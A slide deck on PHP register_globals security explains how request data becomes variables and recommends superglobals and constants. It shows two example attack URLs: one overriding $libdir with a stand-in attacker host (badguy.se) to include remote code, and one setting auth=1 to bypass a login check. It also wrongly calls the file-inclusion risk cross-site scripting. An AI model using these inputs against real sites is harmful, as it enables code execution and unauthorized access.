PHP Security: register_globals

russianmiserableΑσφάλεια

13 Ιουν 2012 (πριν από 5 χρόνια και 6 μέρες)

351 εμφανίσεις

PHP Security:
register_globals

How To Make It Difficult For
Hackers To Set Variables

What Is
register_globals
?


A directive in
php.ini

to automatically
make variables out of environment, GET,
POST, cookies, and server data (true/false)


C.f.
variables_order

(EGPCS)

Examples (Part 1)

<form …>

<input type=“text” name=“mytext” />

<input type=“hidden” name=“myhide” value=“other” />

</form>


With
register_globals

turned on, PHP will
automatically create variables
$mytext

and
$myhide

and
populate them with the values entered in the form (whether
GET or POST).

Examples (Part 2)

Similarly, with the URL…



http://example.com/index.php?george=jungle


…PHP will create
$george

for you and give it the value
“jungle”.


Cookie, server, and environment variables such as
$DOCUMENT_ROOT
and
$PHP_SELF

are also automatically
created and populated.


You don’t know where the values came from (EGPCS).

Problems (Part 1)

<?php

// …some code…


include “$libdir/functions.inc”;


// …more code…

?>


If user sets
$libdir

in the URL, it can override your
$libdir

value, allowing cross
-
site scripting. E.g.:


http://example.com/index.php?libdir=http://badguy.se/hack

Problems (Part 2)

<?php

if ($auth == 1) {


// do stuff for authorized users

} else {


echo “Not authorized!”;

}

?>


If user sets
$auth

in the URL, it can override your
$auth

value,
allowing unauthenticated use. E.g.:


http://example.com/index.php?auth=1

Solutions (Part 1)


Don’t let anyone see your code

If they don’t know what variables to set, they
can’t crack your script!

Security
-
through
-
obscurity

Does not work well, if at all


Check all variables before using them

Good practice anyway

Sometimes hard to check (e.g., $auth)

Solutions (Part 2)


Turn off
register_globals
!

Off by default in PHP 4.2.0 and later anyway


Use the
track_vars

arrays instead:

$_GET

$_POST

$_SERVER

$_FILES

$_ENV

$_COOKIE


Turned on by default in PHP 4.0.3 and later

Solution Examples (Part 1)

<form method=“post”>

<input type=“text” name=“mytext” />

<input type=“hidden” name=“myhide” value=“other” />

</form>


With
register_globals

turned off, PHP will populate
$_POST[‘mytext’]

and
$_POST[‘myhide’]
.


If the method was GET, the values are in
$_GET[]
.

Solution Examples (Part 2)

If a value is set in the URL…

http://example.com/index.php?george=jungle


… it becomes
$_GET[‘george’] = “jungle”


Post
-
method variables are in
$_POST

Get
-
method and URL variables are in
$_GET

Server variables are in
$_SERVER

Uploaded files are in
$_FILES

Cookie values in
$_COOKIE

Environment settings in
$_ENV


You know exactly where values are set from.

Use
define
For Path Names


If you you have to set directory paths in
variables, use constants instead

define(‘LIBDIR’, ‘/path/to/lib’);


Pathnames are especially dangerous in variables
since they can lead directly to cross
-
site scripting
security issues


Once set, constants cannot be redefined, making
them far more secure against accidental or
unexpected value resets and hack attempts

References


http://www.php.net/manual/en/security.registerglobals.php


http://www.php.net/manual/en/security.php


http://www.zend.com/zend/art/art
-
oertli.php


http://www.securereality.com.au/studyinscarlet.txt